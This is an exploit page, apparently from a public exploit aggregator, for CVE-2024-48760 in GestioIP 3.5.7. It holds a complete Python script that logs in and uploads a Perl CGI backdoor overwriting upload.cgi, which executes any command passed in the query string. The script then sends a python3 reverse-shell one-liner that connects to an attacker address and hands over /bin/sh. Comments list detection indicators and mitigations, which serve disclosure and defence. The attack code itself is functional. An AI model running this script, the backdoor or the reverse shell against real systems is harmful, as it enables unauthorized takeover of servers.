## https://sploitus.com/exploit?id=PACKETSTORM:190466
# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
    # Exploit Author: m4xth0r (Maximiliano Belino)
    # Author website: https://maxibelino.github.io/
    # Author email (max.cybersecurity at belino.com)
    # GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
    # Date: 2025-01-13
    # Vendor Homepage: https://www.gestioip.net/
    # Software Link: https://www.gestioip.net/en/download/
    # Version: GestioIP v3.5.7
    # Tested on: Kali Linux
    # CVE: CVE-2024-48760
    
    import requests
    import sys
    
    # Config
    # Every request below goes through a session carrying this auth tuple
    # (see `session.auth` under __main__), so the issue is post-authentication:
    # a valid GestioIP account is the precondition, and the access log entry
    # for the upload will be attributed to that account.
    username = "gipadmin"
    password = "PASSWORD"
    # Host serving GestioIP; only plain HTTP is used in target_url.
    domain = "localhost"
    # Peer the planted shell connects back to (used by reverse_shell_cmd under
    # __main__). The network-side indicator is an outbound TCP connection from
    # the GestioIP host to this port that is initiated by the web server process.
    local_ip = "10.20.0.1"
    local_port = 443
    # One endpoint serves both roles: it receives the upload and, afterwards,
    # is the path whose query string is executed.
    target_url = f"http://{domain}/gestioip/api/upload.cgi"
    
    # CGI Backdoor Perl
    # Perl CGI source that upload_file() sends under the name 'upload.cgi' --
    # the same script name as the endpoint itself, so the upload presumably
    # overwrites the server's upload.cgi. The CGI reads QUERY_STRING, undoes a
    # few percent-encodings, runs the result in backticks and echoes the
    # output inside <pre>. Detection: requests to /gestioip/api/upload.cgi
    # that carry a query string, responses containing the literal
    # '<!-- CGI backdoor -->' or 'Executing: ' text, and an mtime/checksum
    # change on upload.cgi are all high-fidelity indicators of this payload.
    backdoor_code = """#!/usr/bin/perl -w
    
    use strict;
    
    print "Cache-Control: no-cache\\n";
    print "Content-type: text/html\\n\\n";
    
    my $req = $ENV{QUERY_STRING};
    chomp ($req);
    $req =~ s/%20/ /g; 
    $req =~ s/%3b/;/g;
    $req =~ s/%7c/|/gi;
    $req =~ s/%27/'/g;
    $req =~ s/%22/"/g;
    $req =~ s/%5D/]/g;
    $req =~ s/%5B/[/g;
    
    print "<html><body>";
    print '<!-- CGI backdoor -->';
    
    if (!$req) {
        print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
    } else {
        print "Executing: $req";
    }
    
    print "<pre>";
    my @cmd = `$req`;
    print "</pre>";
    
    foreach my $line (@cmd) {
        print $line . "<br/>";
    }
    
    print "</body></html>";
    """
    
    # Exploit functions
    def upload_file(session, file_name, file_data):
        """Uploads the file to the server.

        Sends a multipart POST to target_url with two parts: a plain
        `file_name` field and a `leases_file` part whose filename is the
        same caller-supplied `file_name` and whose body is `file_data`.
        The weakness tracked as CVE-2024-48760 is that the server evidently
        stores the part under that name in a location the web server
        executes as CGI (the follow-up GET to the same path returns command
        output); restricting the stored name/extension and writing uploads
        outside any CGI-enabled directory are the server-side mitigations.
        Success is judged only by the substring "OK" in the response body.

        Args:
            session: requests.Session that already carries the auth tuple.
            file_name: Name the server is asked to store the part under.
            file_data: File body (a str here; requests encodes it).

        Returns:
            The requests.Response of the POST, only when "OK" was found.

        Raises:
            SystemExit: exit status 1 after printing an error when "OK" is
                absent from the response body.
        """
        files = {
            'file_name': (None, file_name),
            'leases_file': (file_name, file_data)
        }
        response = session.post(target_url, files=files)
        # Substring match only -- any body containing "OK" is treated as success.
        if "OK" not in response.text:
            print(f"[!] Error uploading {file_name}.")
            sys.exit(1)
        return response
    
    def run_command(session, cmd):
        """Execute a command in the server through the vuln.

        Appends `cmd` verbatim as the query string of target_url (no URL
        encoding is applied here; the uploaded CGI decodes a few escapes
        itself) and prints the response body, which the CGI fills with the
        command output. From the defender's side every such request is a
        GET to upload.cgi with a non-empty query string -- a pattern the
        legitimate upload endpoint has no reason to receive.

        Args:
            session: requests.Session that already carries the auth tuple.
            cmd: Command text sent as the raw query string.
        """
        url = target_url + '?' + cmd
        resp = session.get(url)
        print(resp.text)
    
    def backdoor_exists(session):
        """Verifies if backdoor is already uploaded or not.

        Issues GET target_url?whoami and treats the literal "www-data" in the
        body as proof that the planted CGI is already in place. The probe
        assumes the CGI runs as the web server account; a different account
        name would make this return False even if the file is present.

        Args:
            session: requests.Session that already carries the auth tuple.

        Returns:
            True when "www-data" appears in the response body, else False.
        """
        response = session.get(target_url + "?whoami")
        if "www-data" in response.text:
            return True  # backdoor already uploaded
        return False  # backdoor not uploaded yet
    
    if __name__ == '__main__':
        with requests.Session() as session:
            # Tuple auth: requests sends HTTP Basic credentials on every request,
            # so the whole exchange is attributable to this account in the logs.
            session.auth = (username, password)
    
            # Verify if backdoor is already uploaded
            # The upload is skipped when the probe already sees command output,
            # so a compromised host keeps the same overwritten upload.cgi across
            # runs -- a file-integrity check on that script detects it.
            if not backdoor_exists(session):
                print("\n[!] Uploading backdoor...\n")
                upload_file(session, 'upload.cgi', backdoor_code)
            else:
                print("\n[+] Backdoor already uploaded. Continue...\n")
    
            # Execute the reverse shell
            # The planted CGI runs this python3 one-liner, which connects from the
            # GestioIP host to local_ip:local_port and attaches /bin/sh to the
            # socket. Egress filtering from the web tier and alerting on the web
            # server account spawning python3/sh are the corresponding controls.
            print("\n[!] Executing reverse shell...\n")
            reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
            run_command(session, reverse_shell_cmd)